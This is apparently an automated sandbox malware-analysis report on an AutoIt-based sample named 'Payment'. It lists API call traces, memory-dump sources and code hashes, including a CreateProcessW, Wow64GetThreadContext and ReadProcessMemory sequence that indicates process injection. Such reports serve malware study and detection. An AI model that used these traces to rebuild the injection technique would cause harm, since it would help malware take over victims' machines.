                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00AD5981,?,?,?,?), ref: 00B0E19C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 7e8c2ef0cecc3db704f8f79607ea7f0223761b67d2d962a7eb93910b92c4531b
                                                          • Instruction ID: c6e13e4d2f32dd67636d7a518ef586c518c06d92f7f7d10b24b4f2e49784b9ba
                                                          • Opcode Fuzzy Hash: 7e8c2ef0cecc3db704f8f79607ea7f0223761b67d2d962a7eb93910b92c4531b
                                                          • Instruction Fuzzy Hash: 8301B570644708BEF3241E24CC8AF767BDCEB01768F148319BAE66A2E0CAB05E458B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AF594C: __FF_MSGBANNER.LIBCMT ref: 00AF5963
                                                            • Part of subcall function 00AF594C: __NMSG_WRITE.LIBCMT ref: 00AF596A
                                                            • Part of subcall function 00AF594C: RtlAllocateHeap.NTDLL(01470000,00000000,00000001,00000000,?,?,?,00AF1013,?), ref: 00AF598F
                                                          • std::exception::exception.LIBCMT ref: 00AF102C
                                                          • __CxxThrowException@8.LIBCMT ref: 00AF1041
                                                            • Part of subcall function 00AF87DB: RaiseException.KERNEL32(?,?,?,00B8BAF8,00000000,?,?,?,?,00AF1046,?,00B8BAF8,?,00000001), ref: 00AF8830
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3902256705-0
                                                          • Opcode ID: f943914a72e7cf62d872d7a8e78f1792ff41d1f73fc6af4cd8a573ae3b39926b
                                                          • Instruction ID: 6a583631cdcede27ea899db32c57853638fabb4e3ee1953ab0d6d11563bbed40
                                                          • Opcode Fuzzy Hash: f943914a72e7cf62d872d7a8e78f1792ff41d1f73fc6af4cd8a573ae3b39926b
                                                          • Instruction Fuzzy Hash: 22F0A43690061DA6DB24BBE8ED069FFB7E89F00351F100466FB04A6592EFB58A8086D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __lock_file_memset
                                                          • String ID:
                                                          • API String ID: 26237723-0
                                                          • Opcode ID: 1fbfe19924fdd68f8d5d7f5ce63aa930385c9e9abfeb81df772cea5b0cf584cc
                                                          • Instruction ID: 6a1dfe0072f0d3645f621aac155bc070082b8765350ce29497008e6e9f0660ac
                                                          • Opcode Fuzzy Hash: 1fbfe19924fdd68f8d5d7f5ce63aa930385c9e9abfeb81df772cea5b0cf584cc
                                                          • Instruction Fuzzy Hash: DD014471C00A0DEBCF22AFF9DD059BE7B61AF407A0F148215BB245B1A1DB358A51EB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AF8D68: __getptd_noexit.LIBCMT ref: 00AF8D68
                                                          • __lock_file.LIBCMT ref: 00AF561B
                                                            • Part of subcall function 00AF6E4E: __lock.LIBCMT ref: 00AF6E71
                                                          • __fclose_nolock.LIBCMT ref: 00AF5626
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: 85c16c052ab47215d3ad71eb9032fcd68147518d9e2a12014df42c02d6b9d529
                                                          • Instruction ID: ff32bfd461603bccb098f9326120d16676f352b9554e1bea99dbe622028ef22a
                                                          • Opcode Fuzzy Hash: 85c16c052ab47215d3ad71eb9032fcd68147518d9e2a12014df42c02d6b9d529
                                                          • Instruction Fuzzy Hash: 9CF09071D00A0C9ADB60AFF5890277E66E16F40734F598209B724EB1C1CF7C89019B55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 02141B2D
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02141B51
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02141B73
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2157017253.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2140000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                          • Instruction ID: 2ccd40f237431774ccd47d4879ce74fdd4210e16edde1fbe9be4150b7c4cd3c7
                                                          • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                          • Instruction Fuzzy Hash: 8E12CD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4E81CF5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 958fe941d032a1695aaa89c5ba0aa7ab92e0096ee0dfec6dda1bf76df3dc722e
                                                          • Instruction ID: b803e7dd8e1e9fe73ddf3e47a3ec342d37aefbf207632e83c214e325b5e6df71
                                                          • Opcode Fuzzy Hash: 958fe941d032a1695aaa89c5ba0aa7ab92e0096ee0dfec6dda1bf76df3dc722e
                                                          • Instruction Fuzzy Hash: 04515035600614AFCF14EB68CA95FAE77F5AF45750F1481A9F906AB392DB30ED00CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 464124430e8de5960c13c3c2f65887e6ee4843d4792a7d1da34d152b5713a97e
                                                          • Instruction ID: 46f28561f7b580f073661bd57d27d0ddae68e7ff97462cd9dda3e987a6d26a9f
                                                          • Opcode Fuzzy Hash: 464124430e8de5960c13c3c2f65887e6ee4843d4792a7d1da34d152b5713a97e
                                                          • Instruction Fuzzy Hash: 42318379608A02DFC7289F19C590D39F7B4FF08310714C56AE99A8B7A5FB30E891CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00AD5CF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: e880ac31c30530c8002c1f3f44d58f637f85800c7e7c37072b1026b550e8bc7a
                                                          • Instruction ID: db29a807caf75ee847e630960e3c9ad5846aeb1e51c82c0ab3fb058208758c8c
                                                          • Opcode Fuzzy Hash: e880ac31c30530c8002c1f3f44d58f637f85800c7e7c37072b1026b550e8bc7a
                                                          • Instruction Fuzzy Hash: DD314C71E10B09AFCB18DF2DC484A6DB7B6FF48310F14862AE81A93714D771B960DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 22d1bdccff513090461df16eb469ae2fd46af9ac1a97b2ba26c3208a52a014ab
                                                          • Instruction ID: 73ccff92da7500ab1d0575e8722589635618fafaf7bf63c6127b1d0d2095b84d
                                                          • Opcode Fuzzy Hash: 22d1bdccff513090461df16eb469ae2fd46af9ac1a97b2ba26c3208a52a014ab
                                                          • Instruction Fuzzy Hash: 67415774508351DFDB24DF14C484B1ABBE0BF48308F1988ADE98A8B362C772EC85CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                          • Instruction ID: ab9eba5b9576553e7ec2e4cf5cc2eee931a4dfd580ee8a5d3d3431368a4e9a2d
                                                          • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                                                          • Instruction Fuzzy Hash: FF11B132209215AFD718DF28C891C7EB7A9EF45364764861BF916DB3A1EB32EC118790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00AD4D4D
                                                            • Part of subcall function 00AF548B: __wfsopen.LIBCMT ref: 00AF5496
                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AD4F6F
                                                            • Part of subcall function 00AD4CC8: FreeLibrary.KERNEL32(00000000), ref: 00AD4D02
                                                            • Part of subcall function 00AD4DD0: _memmove.LIBCMT ref: 00AD4E1A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                          • String ID:
                                                          • API String ID: 1396898556-0
                                                          • Opcode ID: f95e67903141f86ce8bedeeb6bd2db6927668df56d029c3fdf8918bd85a8f327
                                                          • Instruction ID: 0b9a9d60a324ae07758e31f96856ed0eda9ea22f54610602459fbbeb556edb72
                                                          • Opcode Fuzzy Hash: f95e67903141f86ce8bedeeb6bd2db6927668df56d029c3fdf8918bd85a8f327
                                                          • Instruction Fuzzy Hash: 5511E732A00709ABCB24BF70CD02B6E77E59F48B01F10842AF582A63D1DE719A059B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 930e9987352be3857355c5dccb5311c046ac70251d0d69f684cdf05e2cdf1026
                                                          • Instruction ID: c7bfe77f90ab218f0825d0a9e14e471accfe054adacc0ed6d31b7fa4d166ae31
                                                          • Opcode Fuzzy Hash: 930e9987352be3857355c5dccb5311c046ac70251d0d69f684cdf05e2cdf1026
                                                          • Instruction Fuzzy Hash: A22122B4508351DFCB24DF54C484B2ABBE0BF88304F0589A9F98A47721DB31E889CB93
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00AD5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00AD5D76
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 384a7934068e1bc09afcb2e2ad8c1a652a020bf7e2f93595783e5f367e82b7de
                                                          • Instruction ID: b0c7a2cd65aec3c18f60e19d8a26349092c89753b55e10f4230bdf25deb7f9d1
                                                          • Opcode Fuzzy Hash: 384a7934068e1bc09afcb2e2ad8c1a652a020bf7e2f93595783e5f367e82b7de
                                                          • Instruction Fuzzy Hash: 4311F531600B059FE720CF25C888B66B7FAEF45760F14892EE5EB86A50D7B1E945CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __lock_file.LIBCMT ref: 00AF4AD6
                                                            • Part of subcall function 00AF8D68: __getptd_noexit.LIBCMT ref: 00AF8D68
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2597487223-0
                                                          • Opcode ID: 7cf0531db7f4b57ff8219de1f09f11dc78fdfb531a7f6114923fff8b187546f6
                                                          • Instruction ID: b7a1bb2a35d9668ded4230f62354e1ac00d6f62c7070b0d25623489d51476434
                                                          • Opcode Fuzzy Hash: 7cf0531db7f4b57ff8219de1f09f11dc78fdfb531a7f6114923fff8b187546f6
                                                          • Instruction Fuzzy Hash: 2CF0AF31A4020DABDF61BFF4CD067BF36A5AF04365F048514BA24AA1E1DB78CA51DF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,00B962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AD4FDE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: e5268a8ecf585d69b39a4cbf257e34cbf3b07e7f25fcc4d0fdbd31f04b5b0e6f
                                                          • Instruction ID: e93605d3d387e9dc7907f21003d260dcdf7b71cb91b25680e9628557ff93e469
                                                          • Opcode Fuzzy Hash: e5268a8ecf585d69b39a4cbf257e34cbf3b07e7f25fcc4d0fdbd31f04b5b0e6f
                                                          • Instruction Fuzzy Hash: 53F01571509B12CFCB349F64E494822BBF1AF0CB293208A7EE2D782720CB31A840DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AF09F4
                                                            • Part of subcall function 00AD7D2C: _memmove.LIBCMT ref: 00AD7D66
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_memmove
                                                          • String ID:
                                                          • API String ID: 2514874351-0
                                                          • Opcode ID: 514a08d92d087c55c9e1b70489f452890425d3a47c9b9efb8e47d1dad8a9c44c
                                                          • Instruction ID: 8bb3e735a855fa9a3c080333859023fcc0cbb846bf578611b1fb1a335b33fa6d
                                                          • Opcode Fuzzy Hash: 514a08d92d087c55c9e1b70489f452890425d3a47c9b9efb8e47d1dad8a9c44c
                                                          • Instruction Fuzzy Hash: 84E0867690422857C721E6589C05FFAB7EDDF88791F0401F6FC4CD7244ED619C818690
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock
                                                          • String ID:
                                                          • API String ID: 2638373210-0
                                                          • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                          • Instruction ID: 42962e768465f438af23d44cbb7654165a3e7ed6d5080a3f287a7fb92b194e5c
                                                          • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                          • Instruction Fuzzy Hash: 3FE092B0504B005FD7348A24D8507E373E0EB06315F00085CF29AA3341EBA278418759
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00B0E16B,?,?,00000000), ref: 00AD5DBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: c7dcce9a468251e12d43f1a62014601d7cfa8fef11b61d3d2c3e275dedbad22d
                                                          • Instruction ID: 9b8022b19fa1c639b4fe7b1bc7288dd3f5955912c6f39b1ebcaaf4c624138c41
                                                          • Opcode Fuzzy Hash: c7dcce9a468251e12d43f1a62014601d7cfa8fef11b61d3d2c3e275dedbad22d
                                                          • Instruction Fuzzy Hash: 02D09E74640208BFE610DB80DC46FAAB77CD705711F100194BD04A729096B27D508695
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
